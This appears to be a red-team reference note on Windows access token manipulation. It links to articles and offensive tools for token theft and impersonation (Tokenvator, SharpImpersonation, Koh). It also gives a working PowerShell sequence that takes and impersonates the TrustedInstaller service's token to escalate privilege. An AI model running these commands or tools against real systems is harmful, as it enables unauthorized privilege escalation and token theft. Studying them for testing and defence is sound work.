token-manipulation.md

Token Manipulation

• https://posts.specterops.io/understanding-and-defending-against-access-token-theft-finding-alternatives-to-winlogon-exe-80696c8a73b
• https://securitytimes.medium.com/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa
• https://securitytimes.medium.com/understanding-and-abusing-access-tokens-part-ii-b9069f432962
• https://xret2pwn.github.io//Access-Token-Part0x01/
• https://xret2pwn.github.io//Building-Token-Vault-Part0x02/

Trusted Installer Token

• https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/main/NtObjectManager/NtTokenFunctions.ps1
• https://github.com/rweijnen/Posh-Snippets/blob/master/DCOM-FixUp.ps1

PS > Install-Module -Name NtObjectManager -Confirm:$false
PS > Restart-Service TrustedInstaller
PS > $procId = (Get-Process TrustedInstaller).Id
PS > $token = Get-NtTokenFromProcess -ProcessId $procId
PS > $current = Get-NtThread -Current -PseudoHandle
PS > $ctx = $current.Impersonate($token)
PS > $impToken = Get-NtToken -Impersonation
PS > $impToken.Groups

Tools

• https://github.com/dievus/msImpersonate
• https://github.com/magnusstubman/tokenduplicator

Tokenvator

• https://www.netspi.com/blog/technical/adversary-simulation/tokenvator-a-tool-to-elevate-privilege-using-windows-tokens/
• https://www.netspi.com/blog/technical/adversary-simulation/tokenvator-release-2/
• https://github.com/0xbadjuju/Tokenvator

SharpImpersonation

• https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/
• https://github.com/S3cur3Th1sSh1t/SharpImpersonation

Koh

• https://posts.specterops.io/koh-the-token-stealer-41ca07a40ed6
• https://github.com/GhostPack/Koh